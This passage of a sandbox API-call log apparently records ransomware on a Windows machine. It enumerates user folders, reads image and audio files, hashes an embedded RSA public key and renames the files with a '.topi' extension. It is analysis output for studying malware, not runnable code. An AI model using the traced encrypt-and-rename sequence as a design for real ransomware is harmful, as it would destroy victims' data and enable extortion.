(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H4JY_jz9eXsr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h4jy_jz9exsr.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H4JY_jz9eXsr.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h4jy_jz9exsr.mp3.topi")) returned 1 [0095.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.272] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.273] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.273] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 0 [0095.273] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.273] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.273] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.273] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.273] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0095.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.274] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.274] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.274] PathFindFileNameW (pszPath="") returned="" [0095.274] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.274] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.275] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0095.275] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.275] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.275] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.275] PathFindFileNameW (pszPath="") returned="" [0095.275] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.276] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.276] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0095.276] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.276] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.276] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.276] PathFindFileNameW (pszPath="") returned="" [0095.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2g0XsPiX_C7i.bmp") returned=".bmp" [0095.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2g0XsPiX_C7i.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2g0xspix_c7i.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.276] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=99266) returned 1 [0095.276] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.280] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1839c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.280] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.281] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.281] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x183c2, lpOverlapped=0x0) returned 1 [0095.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.282] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.283] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.283] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.283] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.284] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.284] GetLastError () returned 0x0 [0095.284] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.284] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.284] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.284] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.284] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x183c0) returned 0x9a06a00 [0095.285] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1a40 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1a88 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.285] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9438 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9420 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.286] GetCurrentThreadId () returned 0x8c4 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5ec0 [0095.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.287] GetCurrentThreadId () returned 0x8c4 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9450 [0095.289] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2g0XsPiX_C7i.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2g0xspix_c7i.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2g0XsPiX_C7i.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2g0xspix_c7i.bmp.topi")) returned 1 [0095.291] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3C_zMbuR.jpg") returned=".jpg" [0095.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3C_zMbuR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3c_zmbur.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.291] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=9454) returned 1 [0095.291] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.295] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x24c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.295] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.296] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.297] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.297] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.297] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.297] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.297] GetLastError () returned 0x0 [0095.297] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.297] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.297] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.298] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.298] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24f0) returned 0x99f72d8 [0095.298] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1a88 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1ad0 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.298] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.299] RtlAllocateHeap (HeapHandle=0x680000, 